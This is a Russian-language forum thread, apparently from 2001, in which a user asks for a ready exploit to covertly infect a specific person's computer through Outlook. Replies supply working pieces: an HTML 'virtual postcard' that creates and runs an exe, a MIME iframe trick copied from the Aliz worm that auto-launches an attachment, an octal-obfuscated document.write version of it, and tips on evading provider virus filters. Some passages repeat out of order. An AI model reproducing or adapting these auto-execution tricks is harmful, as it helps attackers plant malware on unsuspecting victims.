недавно был такой вопрос и приводился даже полный текст письма... как тока юзер станет на писмьо аттач запускается (для IE 5.00-5.01 и может быть ниже)
таким макаром размножается WORM_ALIZ.A, WORM_BADTRANS.B
Помогите, плиз!
Известен адрес е-почты, что человек пользуется Outlook (версия не известна).
Собсно, нужен готовый exploit для запуска приаттаченного exe, использующий дыры JavaScript и VB. С этими вещами я как раз и не имел дела, а изучать их нет времени. Виндовский ехе-шник на 2 - 5кБ я могу написать сам.
На всякие "readme.exe" и "my.jpg___.exe" рассчитывать не приходится -жертва не идиот. Письмо, скорее, пойдет в виде псевдоспама и после заражения машины пользователь удалит его сам.
Буду рад, если зашлете конкретные ссылки на dbak@newmail.ru
Вариант №213.12.01 16:46 Автор: DmB Статус: Незарегистрированный пользователь
Вариант №2. Тоже нашел на форуме. Это как раз работает.
На халявном сервере заводится страница (см. текст ниже) 7654321.html. В примере лежит безобидный ехе-шник на 1,5 кб, выдающий MessageBox: "It's really working!".
В html делаем "виртуальную открытку" и шлем клиенту письмо "С нашего сервера Вам послали открытку + ссылка".
При просмотре "открытки" создается и запускается ехе.
----------------------------------------
<HTML><HEAD>
<META NAME="GENERATOR" Content="Outlook">
<META HTTP-EQUIV="Content-Type" content="text/html; charset=windows-1251">
<TITLE>Document Title</TITLE></HEAD>
недавно был такой вопрос и приводился даже полный текст письма... как тока юзер станет на писмьо аттач запускается (для IE 5.00-5.01 и может быть ниже)
таким макаром размножается WORM_ALIZ.A, WORM_BADTRANS.B
ищи на борде13.12.01 16:26 Автор: DmB Статус: Незарегистрированный пользователь
> недавно был такой вопрос и приводился даже полный текст > письма... как тока юзер станет на писмьо аттач запускается > (для IE 5.00-5.01 и может быть ниже) > таким макаром размножается WORM_ALIZ.A, WORM_BADTRANS.B
Нашел. Far-ом сделал MIME код своего exe-шника. Для засылки использовал немного модифицированный SMTP-клиент
с http://www.sources.ru/cpp/cpp_mail_utilits.shtml (почтовые утилитки с исходниками). Однако SMTP моего прова ругается на это письмо (Ошибка 554), что там мол есть вирус Win32.Aliz и никуда письмо не шлет. Да сейчас у многих провайдеров исходящая/входящая почта проверяется.
Крутил-вертел эти строчки.
<iframe src=3Dcid:APPENDIX height=3D0 width=3D0></iframe>
...
--part_bound
Content-Type: text/plain;
name="test.exe"
Content-Transfer-Encoding: base64
Content-ID: <APPENDIX>
Первая строчка в варианте
<SCRIPT LANGUAGE="JAVASCRIPT"><!--
document.write("\74\151\146\162\141\155\145\40\163\162\143\75\63\104\143\151\144\72\101\120\120\105\116\104\111\130\40\150\145\151\147\150");
document.write("\164\75\63\104\60\40\167\151\144\164\150\75\63\104\60\76\74\57\151\146\162\141\155\145\76");
-->
вроде шлется. Но Outlook2000 (не Outlook Express) аттач не запускает.
ищи на борде18.12.01 03:07 Автор: lucker Статус: Незарегистрированный пользователь
Есть плагин для Far MxUUE. Посмотри в поисковиках "Far Plug-in MxUUE".
На www.lycos.ru нашел первой строчкой, например, http://www.ag.ru/far/plugins.shtml.
Плагин позволяет кодировать-декодировать в/из MIME и UUE.
Если не найдешь :(, могу заслать мылом.
Как заслать трояна через Outlook07.12.01 21:33 Автор: zuv Статус: Незарегистрированный пользователь
exe не используй, bat ...
Если OE не 6, а ниже то он даже не заметит.
Основан на том что парсеры большинства почтовых серверов не фильтруют ссылки src=3D....
> Помогите, плиз! > Известен адрес е-почты, что человек пользуется Outlook > (версия не известна). > Собсно, нужен готовый exploit для запуска приаттаченного > exe, использующий дыры JavaScript и VB. С этими вещами я > как раз и не имел дела, а изучать их нет времени. > Виндовский ехе-шник на 2 - 5кБ я могу написать сам. > > На всякие "readme.exe" и "my.jpg___.exe" рассчитывать не > приходится -жертва не идиот. Письмо, скорее, пойдет в виде > псевдоспама и после заражения машины пользователь удалит > его сам. > > Буду рад, если зашлете конкретные ссылки на dbak@newmail.ru
А как использовать данный скрипт ?09.12.01 17:09 Автор: icehzr Статус: Незарегистрированный пользователь